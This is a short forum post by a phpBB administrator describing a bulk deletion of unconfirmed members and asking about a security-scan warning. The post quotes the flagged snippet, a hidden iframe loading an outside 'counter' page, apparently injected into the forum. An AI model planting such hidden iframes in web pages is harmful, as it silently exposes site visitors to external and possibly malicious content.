I have written about the
phpBB Admin Toolkit Starfoxtj elswhere. Today I logged in and deleted about 600 members that has only signed up but not confirmed their registration in a few minutes. Done like this:
- Sort: Order by last visit - Descending.
- Display 200.
- Scroll to the bottom.
- Check with selected. (Groups of 200 selected).
- Type in the word "delete" in the delete field.
- Hit delete and the first group of 200 members that only registered but did not confirm registration are deleted). May be too strict, but it is the forum policy.
Then on that Admin toolkit page I noted the following when I run the security scan:
"
Malicious information detected:
One or more of the javascript, iframe or embed tags have been detected in this description. Unless you intentionally added this information yourself, this description should be sanitized."
<iframe src=http://googlerank.info/counter style=display:none></iframe>
Anybody that has an idea of what this is?